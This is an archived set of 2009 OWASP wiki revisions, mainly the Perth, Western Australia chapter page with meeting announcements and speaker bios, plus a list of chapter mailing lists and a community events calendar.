[http://lists.owasp.org/mailman/listinfo/owasp-philadelphia Mailing List]

(C) 40.3047,-80.0713,pittsburgh
[http://lists.owasp.org/mailman/listinfo/owasp-pittsburgh Mailing List]

(C) 9,-79.5,panama
[http://lists.owasp.org/mailman/listinfo/owasp-panama Mailing List]

(C) 43.2,-77.6,rochester
[http://lists.owasp.org/mailman/listinfo/owasp-rochester Mailing List]

(C) 38.6,-121.5,sacramento
[http://lists.owasp.org/mailman/listinfo/owasp-sacramento Mailing List]

(C) 38.6,-90.2,stlouis
[http://lists.owasp.org/mailman/listinfo/owasp-stlouis Mailing List]

(C) 29.5,-98.5,sanantonio
[http://lists.owasp.org/mailman/listinfo/owasp-sanantonio Mailing List]

(C) 37.8,-122.4,san-fran
[http://lists.owasp.org/mailman/listinfo/owasp-san-fran Mailing List]

(C) 37.3,-121.9,sanjose
[http://lists.owasp.org/mailman/listinfo/owasp-sanjose Mailing List]

(C) 47.6,-122.3,seattle
[http://lists.owasp.org/mailman/listinfo/owasp-seattle Mailing List]

(C) 1,103,singapore
[http://lists.owasp.org/mailman/listinfo/owasp-singapore Mailing List]

(C) 47,8,switzerland
[http://lists.owasp.org/mailman/listinfo/owasp-switzerland Mailing List]

(C) -34,151,sydney
[http://lists.owasp.org/mailman/listinfo/owasp-sydney Mailing List]

(C) 35.1,-90,memphis
[http://lists.owasp.org/mailman/listinfo/owasp-memphis Mailing List]

(C) 35,139,tokyo
[http://lists.owasp.org/mailman/listinfo/owasp-tokyo Mailing List]

(C) 43.6,-79.4,toronto
[http://lists.owasp.org/mailman/listinfo/owasp-toronto Mailing List]

(C) 39,32,turkey
[http://lists.owasp.org/mailman/listinfo/owasp-turkey Mailing List]

(C) 39.170070,-76.848333,washington
[http://lists.owasp.org/mailman/listinfo/owasp-washington Mailing List]

(C) 49.8,-97,winnipeg
[http://lists.owasp.org/mailman/listinfo/owasp-winnipeg Mailing List]

(C) 14,120,manila
[http://lists.owasp.org/mailman/listinfo/owasp-manila Mailing List]

(C) 3,101,malaysia
[http://lists.owasp.org/mailman/listinfo/owasp-malaysia Mailing List]

(C) 38.8,-77.4,wash_dc_va
[http://lists.owasp.org/mailman/listinfo/owasp-wash_dc_va Mailing List]

(C) 45,-76,ottawa
[http://lists.owasp.org/mailman/listinfo/owasp-ottawa Mailing List]

(C) 49,-123,vancouver
[http://lists.owasp.org/mailman/listinfo/owasp-vancouver Mailing List]

(C) 42,-71.227,bostonfinancialdist
[http://lists.owasp.org/mailman/listinfo/owasp-bostonfinancialdist Mailing List]

(C) 41.3,2.1,spain
[http://lists.owasp.org/mailman/listinfo/owasp-spain Mailing List]

(C) -34.5667,-58.4167,argentina
[http://lists.owasp.org/mailman/listinfo/owasp-Argentina Mailing List]

(C) 41.5,-81.7,cleveland
[http://lists.owasp.org/mailman/listinfo/owasp-cleveland Mailing List]

(C) -15.47,-47.55,brazil (Brasilia)
[http://lists.owasp.org/mailman/listinfo/owasp-brazil Mailing List]

(C) -33.27,-70.4,chile
[http://lists.owasp.org/mailman/listinfo/owasp-chile Mailing List]

(C) 24.64,46.77,riyadh
[http://lists.owasp.org/mailman/listinfo/owasp-riyadh Mailing List]

(C) 5,-74.48,colombia
[http://lists.owasp.org/mailman/listinfo/owasp-colombia Mailing List]

(C) 24.48,66.59,pakistan
[http://lists.owasp.org/mailman/listinfo/owasp-pakistan Mailing List]

(C) 55.41,12.31,denmark
[http://lists.owasp.org/mailman/listinfo/owasp-denmark Mailing List]

(C) 53.34,-113.31,edmonton
[http://lists.owasp.org/mailman/listinfo/owasp-edmonton Mailing List]

(C) 29.46,-95.22,houston
[http://lists.owasp.org/mailman/listinfo/owasp-houston Mailing List]

(C) 30.2669,-97.7429,austin
[http://lists.owasp.org/mailman/listinfo/owasp-austin Mailing List]

(C) -27.718,153.240,brisbane
[http://lists.owasp.org/mailman/listinfo/owasp-brisbane Mailing List]

(C) 22.57,120.12,taiwan
[http://lists.owasp.org/mailman/listinfo/owasp-taiwan Mailing List]

(C) 40.7,-73.9,longisland
[http://lists.owasp.org/mailman/listinfo/owasp-longisland Mailing List]

(C) 60.39,25.51,helsinki
[http://lists.owasp.org/mailman/listinfo/owasp-helsinki Mailing List]

(C) 39.856,-104.97,denver
[http://lists.owasp.org/mailman/listinfo/owasp-denver Mailing List]

(C) 36.17,-86.78,nashville
[http://lists.owasp.org/mailman/listinfo/owasp-nashville Mailing List]

(C) 33.669,-111.948,phoenix
[http://lists.owasp.org/mailman/listinfo/owasp-phoenix Mailing List]

(C) 13,80.2,chennai
[http://lists.owasp.org/mailman/listinfo/owasp-chennai Mailing List]

(C) 48.8167,2.3167,france
[http://lists.owasp.org/mailman/listinfo/owasp-france Mailing List]

(C) 29.2,48,kuwait
[http://lists.owasp.org/mailman/listinfo/owasp-kuwait Mailing List]

(C) -36.51,174.47,newzealand
[http://lists.owasp.org/mailman/listinfo/owasp-newzealand Mailing List]

(C) 37.25,127,southkorea
[http://lists.owasp.org/mailman/listinfo/owasp-southkorea Mailing List]

(C) 18.32,73.51,pune
[http://lists.owasp.org/mailman/listinfo/owasp-pune Mailing List]

(C) 41.3,2.1,spanish
[http://lists.owasp.org/mailman/listinfo/owasp-spanish Mailing List]

(C) 51.1,-114,calgary
[http://lists.owasp.org/mailman/listinfo/owasp-calgary Mailing List]

(C) 38.7039,-9.0359,portuguese
[http://lists.owasp.org/mailman/listinfo/owasp-portuguese Mailing List]

(C) 32.7,-117.2,sandiego
[http://lists.owasp.org/mailman/listinfo/owasp-sandiego Mailing List]

(C) 23.1,72.6,ahmedabad
[http://lists.owasp.org/mailman/listinfo/owasp-ahmedabad Mailing List]

(C) 33.57,-86.75,alabama
[https://lists.owasp.org/mailman/listinfo/owasp-alabama Mailing List]

(C) 56.4,23.44,latvia
[http://lists.owasp.org/mailman/listinfo/owasp-latvia Mailing List]

(C) 59.2,18.03,sweden
[http://lists.owasp.org/mailman/listinfo/owasp-sweden Mailing List]

(C) 39.8,-84.3,cincinnati
[http://lists.owasp.org/mailman/listinfo/owasp-cincinnati Mailing List]

(C) -23.32208,-46.757812,sanpaulo
[http://lists.owasp.org/mailman/listinfo/owasp-sanpaulo Mailing List]

(C) 40.0537,-83.0725,columbus
[http://lists.owasp.org/mailman/listinfo/owasp-columbus Mailing List]

(C) 33.72,-118.030,orange_county
[http://lists.owasp.org/mailman/listinfo/owasp-orange_county Mailing List]

(C) 50.067021,19.920438,poland
[http://lists.owasp.org/mailman/listinfo/owasp-poland Mailing List]

(C) 13.44,100.3,thailand
[http://lists.owasp.org/mailman/listinfo/owasp-thailand Mailing List]

(C) 9.05,7.32,nigeria
[http://lists.owasp.org/mailman/listinfo/owasp-nigeria Mailing List]

(C) 10.759,106.662,vietnam
[http://lists.owasp.org/mailman/listinfo/owasp-vietnam Mailing List]

(C) 22.541,114.054,china-mainland
[http://lists.owasp.org/mailman/listinfo/owasp-China-Mainland Mailing List]

(C) 31.208,121.503,china-mainland
[http://lists.owasp.org/mailman/listinfo/owasp-China-Mainland Mailing List]

(C) 39.892,116.389,china-mainland
[http://lists.owasp.org/mailman/listinfo/owasp-China-Mainland Mailing List]

(C) 44.05,-123.09,eugene
[http://lists.owasp.org/mailman/listinfo/owasp-eugene Mailing List]

(C) 41.44,-72.39,hartford
[http://lists.owasp.org/mailman/listinfo/owasp-hartford Mailing List]

(C) 33.57,-86.75,alabama
[https://lists.owasp.org/mailman/listinfo/owasp-alabama Mailing List]

(C) 21.18,-157.51,hawaii
[https://lists.owasp.org/mailman/listinfo/owasp-hawaii Mailing List]

(C) 27.382893,-82.4356,suncoast
[https://lists.owasp.org/mailman/listinfo/owasp-suncoast Mailing List]

(M) 49.467232, 11.085205, OWASP_AppSec_Germany_2009_Conference

(C) 31.194008, 29.959717,egypt
[https://lists.owasp.org/mailman/listinfo/owasp-egypt Mailing List]
</googlemap>

Perth Australia

2009-09-07T13:14:44Z

Xntrik: Updated previous shlomi bit.

Perth Australia

2009-09-07T13:12:55Z

Xntrik: Updated after Sep meeting

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Previous OWASP Meetings ==

=== Shlomi Cohen of IBM Rational (Sep 2009) ===

The OWASP Perth Chapter is excited to announce our next meeting event.
This meeting is generously being hosted by IBM, who are providing a venue, catering *and* presenter, Shlomi Cohen. Shlomi works in the IBM Rational business unit and was fundamental in the development of their AppScan suite of products.

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 7/9/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

User:Xntrik

2009-09-07T03:45:14Z

Xntrik: first draft

To learn more about me you can check out http://un-excogitate.org

Perth Australia

2009-09-02T02:41:01Z

Xntrik:

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Meeting ==

=== Shlomi Cohen of IBM Rational ===

The OWASP Perth Chapter is excited to announce our next meeting event.
This meeting is generously being hosted by IBM, who are providing a venue, catering *and* presenter, Shlomi Cohen. Shlomi works in the IBM Rational business unit and was fundamental in the development of their AppScan suite of products.

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

'''Date: Monday 7th of September, 2009'''
'''Time: 18:00 sign-in, 18:15 start'''
'''Location: IBM Building, 1060 Hay St, West Perth, 6005'''
'''RSVP: [mailto:christian.frichot@bankwest.com.au Christian Frichot]'''

== Previous OWASP Meetings ==

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 2/9/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2009-09-02T02:27:35Z

Xntrik: Updated Shlomi's Bio

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Meeting ==

=== Shlomi Cohen of IBM Rational ===

The OWASP Perth Chapter is excited to announce our next meeting event.
This meeting is generously being hosted by IBM, who are providing a venue, catering *and* presenter, Shlomi Cohen. Shlomi works in the IBM Rational business unit and was fundamental in the development of their AppScan suite of products.

==== Bio ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

'''Date: Monday 7th of September, 2009'''
'''Time: 18:00 sign-in, 18:15 start'''
'''Location: IBM Building, 1060 Hay St, West Perth, 6005'''
'''RSVP: [mailto:christian.frichot@bankwest.com.au Christian Frichot]'''

== Previous OWASP Meetings ==

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 2/9/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2009-09-01T08:40:30Z

Xntrik: Updates for upcoming Sep 09 meeting with Shlomi Cohen

OWASP Community

2009-03-09T01:09:31Z

Xntrik:

This page is for people to post OWASP related events, such as chapter meetings, OWASP conferences, get-togethers, and OWASP sponsored events.

Events from previous years are archived here:
* '''[[OWASP Community 2006]]'''

This page is monitored, and items posted here will be copied to the OWASP Calendar [[Main Page]]. Please post new items in chronological order using the following format:

'''Mon ## (##:00h) - [[Article]]'''



==Upcoming Events==
=== 2009 ===

'''Feb 10 (17:15h) - [http://www.owasp.org/index.php/Perth_Australia#Threat_Modelling_in_the_Software_Development_Lifecycle_.28Feb_2009.29 Perth Chapter Meeting]'''
=== 2008 ===

'''Dec 11 (17:30h) - [http://www.owasp.org/index.php/Netherlands#Announcement_December_11th_2008:_Architectural_and_design_risk_analysis Netherlands Chapter Meeting]'''

'''Dec 3 (17:30h) - [https://www.owasp.org/index.php/Denmark#Local_News Denmark Chapter Meeting]'''

'''Sept 22nd-25th - [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference NY/NJ Metro]'''

'''Aug 21 (18:00h) - [http://www.owasp.org/index.php/Boulder#Next_Meeting Boulder Chapter Meeting]'''

==Past Events==

'''Dec 11 (18:00h) - [[Switzerland|Switzerland chapter meeting]]'''

'''Mar 26 (17:30h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Jan 29 (11:15h) - [[Helsinki|Helsinki chapter and RWSUG seminar]]'''

'''Jan 29 (11:30h) - [[Cincinnati|Cincinnati chapter meeting]]'''

'''Dec 20 (17:30h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Dec 15 (11:00h) - [[Pune|Pune chapter meeting]]'''

'''Dec 12 (18:00h) - [[Chicago|Chicago chapter meeting]]'''

'''Dec 6 (18:00h) - [[London|London chapter meeting]]'''

'''Dec 5 (18:00h) - [[Boston|Possible Boston OWASP Chapter Meeting]] '''

'''Dec 3 (13:00h) - [[Israel|OWASP Israel 2007]] '''

'''Nov 29 (18:00h) -[[Seattle|Seattle Chapter Meeting]] '''

'''Nov 29 (18:00h) -[[Sacramento|Sacramento Chapter Meeting]] '''

'''Nov 26 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Nov 26 (09:30h) - [[Turkey|Turkey Chapter Meeting - Izmir]] '''

'''Nov 24 (13:30h) - [[Turkey|Turkey Chapter Meeting - Ankara]] '''

'''Nov 20 (18:00h) - [[Belgium|Belgium Chapter Meeting]] '''

'''Nov 14 (18:00h) - [[Ottawa|Ottawa Chapter Meeting]] '''

'''Nov 14 (18:00h) - [[Houston|Houston Chapter Meeting]] '''

'''Nov 11 (18:00h) - [[Ireland|Ireland Chapter Meeting]] '''

'''Nov 7 (18:00h) - [[Boston|Possible Boston OWASP Chapter Meeting]] '''

'''Nov 7 (19:00h) - [[Singapore|Singapore OWASP Chapter Meeting]] '''

'''Nov 3 (18:30h) - [[Malaysia|Malaysia OWASP Chapter Meeting]] '''

'''Oct 9 (19:30h) - [[Singapore|Singapore OWASP chapter meeting]]'''

'''Oct 2 (18:30h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Sept 27 (1800h) - [[New York|NY/NJ Metro chapter meeting]]'''

'''Sept 27 (13:00h) - [[Taiwan|Taiwan chapter meeting]]'''

'''Sept 13 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Sept 10 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Sept 7 (15:00h) [[Germany|German chapter meeting]]''' - Restart of the German Chapter

'''Sept (12:00h) - [[Belgium|Belgium OWASP Day Event]] '''

'''Sept 6 (18:00h) - [[Kansas_City|Kansas City Chapter meeting]]'''

'''Sept 5 (18:00h) - [[Chicago|Chicago Chapter Meeting]]'''

'''Sept 5 (17:00h) - [[Israel|Israeli chapter meeting]]'''

'''Sept 5 (18:00h) - [[London|London chapter meeting]]'''

'''July 25 (18:00h) - [[San Jose|San Jose Chapter Meeting]]'''

'''July 24 (17:00h) - [[Switzerland|Switzerland chapter meeting]]'''

'''July 14 (11:00h) - [[Turkey|Turkey chapter meeting - 1st Web Security Days]]'''

'''July 6 (17:00h) - [[Spain|Spain chapter meeting]]'''

'''June 26 (11:30h) - [[Austin|Austin chapter meeting]]''' - Running Web Application Scans

'''June 22 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''June 21 (19:00h) - [[Denver]]''' - Anti-DNS Pinning Attacks / Calculating Return on Security Investment (ROSI)

'''June 19 (18:00h) - [[Minneapolis St Paul|Minneapolis St Paul chapter meeting]]'''

'''June 15 (17:00h) - [[Spain|Spain chapter meeting]]'''

'''June 14 (08:00h) - [[Vietnam|Vietnam chapter meeting]]'''

'''June 13 (18:30h) - [[Kansas City|Kansas City chapter meeting]]'''

'''June 12 (18:00h) - [[New York|NY/NJ Metro chapter meeting]]'''

'''Jun 5 (19:00h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Jun 5 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Jun 5 (17:30h) - [[Houston | Houston Chapter Meeting]]'''

'''May 29 (9:00h) - [[http://www.owasp.org/index.php/Italy#May_29th.2C_2007_-_Seminar:_.22Software_Security.22 Italy@Firenze Tecnologia]]'''

'''May 29 (11:30h) - [[Austin | Austin Chapter Meeting]]''' - Bullet Proof UI - A programmer's guide to the complete idiot".

'''May 29 (18:00h) - [[Ottawa | Ottawa Chapter Meeting]]'''

'''May 22 (18:30h) - [[New Zealand|1st New Zealand chapter Meeting]]'''

'''May 21 (14:00h) - [[Israel|2nd OWASP Israel mini conference]]'''

'''May 15 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''May 10 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''May 9 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''May 8 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''May 6 (11:00h) - [[Turkey|Turkey chapter meeting]]'''

'''May 2 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''May 1 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Apr 26 (11:00h) - [[San Antonio|San Antonio chapter meeting]]'''

'''Apr 26 (17:00h) - [[Switzerland|Switzerland chapter meeting and "Swiss Security Dinner"]]'''

'''Apr 24 (18:00h) - [[Minneapolis St Paul|Minneapolis St Paul chapter meeting]]'''

'''Apr 20 (19:00h) - [[Hong Kong|Hong Kong chapter meeting - Objectives for 2007]]'''

'''Apr 19 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Apr 18 (17:00h) - [[San Francisco City Chapter Meeting]]'''

'''Apr 17 (18:00h) - [[New Jersey|NY/NJ Metro chapter meeting]]'''

'''Apr 17 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Apr 12 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Apr 12 (18:00h) - [[San Jose|San Jose chapter meeting]]'''

'''Apr 11 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Apr 4 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Apr 3 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Mar 30 - [[http://www.owasp.org/index.php/Italy#March_30th.2C_2007_-_Master_in_Security_-_University_of_Rome_.22La_Sapienza.22| Italy@Master in Security at "La Sapienza"]]'''

'''Mar 28 (18:00h) - [[Washington DC|Washington DC (MD) chapter meeting]]'''

'''Mar 28 (11:30h) - [[San Antonio|San Antonio chapter meeting]]'''

; '''Mar 27-30 - [http://www.blackhat.com Black Hat Euro]'''
: OWASP members receive a Euro 100 Briefings discount by inserting BH7EUASSOC in the box marked “Coupon Codes”

'''Mar 22 (18:00h) - [[London|London chapter meeting]]'''

'''Mar 21-22 - [[Belgium#OWASP_Top_10_2007_Update_.28Infosecurity_Belgium.2C_21_.26_.2622_Mar_2007.29|Belgium@InfoSecurity]]'''

'''Mar 20 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Mar 14 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Mar 14 (18:00h) - [[Chicago|Chicago chapter meeting]]'''

'''Mar 13 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Mar 8 (18:00h) - [[Ottawa|Ottawa Chapter Meeting]] '''

'''Mar 7 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Mar 7 (18:30h) - [[Kansas City|Kansas City chapter meeting]]'''

'''Mar 6 (18:30h) - [[Philadelphia|Philadelphia chapter meeting]]'''

'''Mar 6 (18:30h) - [[San Francisco|San Francisco and San Jose chapter meeting]]'''

'''Mar 6 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Mar 5 (11:00h) - [[New Jersey|New Jersey chapter meeting]]'''

'''Mar 1 (11:30h) - [http://www.eusecwest.com/agenda.html EUSecWest 07: Testing Guide]'''

; '''Feb 26-Mar 1 - [http://www.blackhat.com Black Hat DC]'''
: OWASP members receive a $100 Briefings discount by inserting BH7DCASSOC in the box marked “Coupon Codes”

'''Feb 28 (18:00h) - [[Seattle|Seattle chapter meeting]]'''

'''Feb 27 (18:00h) - [[Edmonton|Edmonton chapter meeting]]'''

'''Feb 22 (18:30h) - [[Helsinki|Helsinki chapter meeting]]'''

'''Feb 22 (18:00h) - [[London|London chapter meeting]]'''

'''Feb 21 (18:30h) - [[Denver|Denver chapter meeting]]'''

'''Feb 19 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Feb 15 (18:00h) - [[Washington DC|Washington DC (MD) chapter meeting]]'''

'''Feb 15 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Feb 14 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Feb 13 (18:00h) - [[Ireland|Ireland chapter meeting]]'''

'''Feb 12 (18:30h) - [[Switzerland|Switzerland chapter meeting]]'''

'''Feb 7 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''Feb 6-7 - [[Italy#February_6th-8th.2C_2007_-_InfoSecurity|Italy@InfoSecurity]]'''

'''Feb 6 (18:00h) - [[Melbourne|Melbourne chapter meeting]]'''

'''Feb 2 (14:00h) - [[Chennai|Chennai chapter meeting]]'''

'''Jan 31 (15:00h) - [[Mumbai|Mumbai chapter meeting]]'''

'''Jan 30 (11:30h) - [[Austin|Austin chapter meeting]]'''

'''Jan 25 (18:00h) - [[San Francisco| San Francisco chapter meeting]]'''

'''Jan 25 (14:30h) - [[Italy#October_25th.2C_2007_-_Isaca_Rome|Italy@ISACA Rome]]'''

'''Jan 24 (17:30h) - [[Israel#6th_OWASP_IL_meeting:_Wednesday.2C_January_24th_2007|6th OWASP Israel chapter meeting]]'''

'''Jan 23 (18:00h) - [[Belgium|Belgium chapter meeting]]'''

'''Jan 22 (18:00h) - [[Rochester|Rochester chapter meeting]]'''

'''Jan 17 (18:30h) - [[Denver|Denver chapter meeting]]'''

'''Jan 16 (17:45h) - [[Edmonton|Edmonton chapter meeting]]'''

'''Jan 11 (18:00h) - [[Netherlands|Netherlands chapter meeting]]'''

'''Jan 11 (18:30h) - [[Phoenix|Phoenix chapter meeting]]'''

'''Jan 11 (18:00h) - [[Virginia (Northern Virginia)|Washington DC (N. VA) chapter meeting]]'''

'''Jan 10 (18:00h) - [[Toronto|Toronto chapter meeting]]'''

'''Jan 8 (18:00h) - [[Seattle|Seattle chapter meeting]]'''

'''Jan 3 (18:30h) - [[Boston|Boston chapter meeting]]'''

'''May 1 - [[Melbourne | Melbourne chapter meeting]]'''

'''May 2 - [[Boston]]'''

'''May 6 - [[Turkey]]'''

'''May 8 - [[Virginia (Northern Virginia)|Washington DC (VA)]]'''

'''May 9 - [[Toronto]]'''

'''May 10 - [[Belgium]]'''

'''May 15 - [[Rochester]]'''

'''May 21 - [[Israel]]'''

'''May 22 - [[New Zealand]]'''

'''May 29 - [[Italy]]'''

'''June 5 - [[Houston]]'''

'''June 5 - [[Melbourne]]'''

'''June 5 - [[Helsinki]]'''

'''June 12 - [[New Jersey]]'''

'''June 15 - [[Spain]]'''

'''July 14 - [[Turkey]]'''

Perth Australia

2009-03-09T01:08:34Z

Xntrik:

Perth Australia

2009-03-04T01:54:03Z

Xntrik:

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* [mailto:timothy.bessant@alphawest.com.au Timothy Bessant]
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Meeting ==

=== Title: TBA ===

==== About the presenter ====
Wade Alcorn is a Principal Security Consultant for NGSSoftware working in all aspects of computer security. He has managed one the largest penetration testing teams in the UK and is currently involved within management in NGS Australia. His technical experience over the past 10 years has ranged from developing/designing PKI and military messaging software, to managing large scale penetration assessments.

Wade has developed various publicly available security tools in areas including browser exploitation frameworks, RFID and BlueTooth. He has produced and presented professional hacking courses for financial and government organisations.

Wade has also published leading papers on emerging threats within Information Security. These have included papers on Inter-protocol Exploitation and Cross-site Scripting Viruses. His Cross-site Scripting Virus paper was the first research to warn of the serious impact this threat would have on the Internet.

'''Date: Wednesday, 11 March 2009'''
'''Location: [http://maps.google.com.au/maps?f=q&source=s_q&hl=en&geocode=&q=edith+cowan+university,+mt+lawley&sll=-25.335448,135.745076&sspn=37.439309,56.25&ie=UTF8&ll=-31.920514,115.872159&spn=0.017412,0.027466&t=h&z=15 Edith Cowan University, Mt Lawley]'''
'''Time: 5:30pm'''
'''RSVP: by 9 March 2009 to [mailto:david.taylor@bankwest.com.au David Taylor]'''

== Previous OWASP Meetings ==

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

